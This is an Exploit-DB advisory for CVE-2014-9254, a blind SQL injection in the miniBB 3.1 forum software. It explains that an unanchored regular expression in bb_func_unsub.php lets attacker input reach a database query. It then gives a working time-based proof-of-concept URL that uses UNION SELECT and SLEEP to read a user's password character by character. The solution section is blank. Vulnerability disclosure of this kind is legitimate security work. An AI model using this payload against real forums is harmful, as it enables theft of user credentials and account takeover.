miniBB 3.1 - Blind SQL Injection

ID EDB-ID:35579
Type exploitdb
Reporter Kacper Szurek
Modified 2014-12-19T00:00:00


miniBB 3.1 - Blind SQL Injection. CVE-2014-9254. Webapps exploit for php platform

                                            # Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link:
# Exploit Author: Kacper Szurek
# Contact:
# Website:
# CVE: CVE-2014-9254
# Category: webapps

1. Description
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).

File: bb_func_unsub.php


if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
	//trying to unsubscribe directly from email
	//manual unsubsribe

if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL will check if first password character user ID=1 is “c”.

If yes, it will sleep 5 seconds.
3. Solution: